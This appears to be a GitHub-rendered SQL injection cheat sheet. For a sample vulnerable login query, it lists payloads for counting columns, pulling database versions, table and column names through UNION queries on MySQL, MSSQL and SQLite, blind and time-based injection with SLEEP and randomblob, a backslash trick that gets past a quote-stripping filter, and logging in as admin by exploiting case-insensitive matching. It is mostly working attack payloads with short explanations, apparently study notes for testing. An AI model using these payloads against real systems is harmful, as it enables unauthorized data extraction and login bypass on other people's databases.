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97 lines (70 loc) · 4.56 KB

File metadata and controls

97 lines (70 loc) · 4.56 KB
In the following queries, ' may not work sometimes, so { `," } can be tested
To comment out the remaining code, { ;#,;--,;// } can be used
While doing sqli through urls, { ;#,;--,;// } need to be encoded specially

Finding no of columns in table (Error-based SQLI)

[Vulnearable code] : SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'

  • [$input_user] : ' UNION SELECT 1,2,3.. FROM table_name --
  • [$input_user] : ' ORDER BY n -- [If we get error for n, then n-1 will be no of columns]

Limiting no of rows

[Vulnearable code] : SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'

  • [$input_user] : ' OR 1=1 LIMIT 1 --

For Mysql

[Vulnearable code] : SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'

Assume no of columns to be 3

Finding version and databases

  • [$input_user] : ' UNION SELECT 1,@@version,database() --

Extracting Tables from databases

  • [$input_user] : ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

Extracting columns from databases

  • [$input_user] : ' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()
  • [$input_user] : ' UNION SELECT table_name, column_name, 1 FROM information_schema.columns

Fetching a particular column without knowing column's name

  • SELECT F.4 FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users)F; will fetch 4th column of users.

    It works because the column names of the table derived from the subselect are the values of the leftmost SELECT

For Mssql

[Vulnearable code] : SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'

Assume no of columns to be 3

Finding version and databases

  • [$input_user] : ' UNION SELECT 1,@@version,db_name(i) -- [Here i is the i-th database present]
  • [$input_user] : ' UNION SELECT 1,@@version,name FROM master..sysdatabases --

[In MsSQL, if second colums is username then the payload ' UNION SELECT 1,1,name FROM master..sysdatabases -- won't work , second column MUST be a string. Interesting !!]

For sqlite

In sqlite sqlite_master replaces information_schema

[Vulnearable code] : SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'

Extracting sqlite version

[$input_user] : ' UNION SELECT sqlite_version()

Extracting table names

[$input_user] : ' UNION SELECT name FROM sqlite_master WHERE type='table'

Extracting column names from a table

[$input_user] : ' UNION SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name = 'table_name'

Blind SQLI

[Vulnearable code] : SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'

  • [$input_user] : ' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "%a%") -- [It will ask whether a user with letter "a" or "A" containing in his name]
  • [$input_user] : ' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "__a%") -- [It will ask whether the letter is at 3rd place or NOT]

HERE %,_ are WILDCARDS. % matches any string and _ matches only one character

  • By default, LIKE is case-insensitive

    [$input_user] : ' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE BINARY "%a%") -- [To make a case sensitive search, use BINARY right after LIKE]

Time-based Blind SQLI

[Vulnearable code] : SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'


  • [$input_user] : ' OR (SELECT SLEEP(10) FROM table_name WHERE username='something') --

  • [$input_user] : ' OR IF(username='something',SLEEP(10),0) --

    [Produces a delayed response if username=something exists]


  • [$input_user] : ' OR CONDITION='true' AND 1=randomblob(100000000) --

    [Produces a delayed response if CONDITION='true']


  • , using JOIN


  • Bypassing filtered '[quote] (special case)

 $name = preg_replace("'","",$name);
 $pass = preg_replace("'","",$pass);
 SELECT * FROM users WHERE username='name' and password='pass'

[attack] => user = \ & pass = OR 1=1 --


  • mysql does a case insensitive search by default and also ignores the trailing spaces

    How to exploit that?

    A username Admin can be created and it can be used to sign-in as admin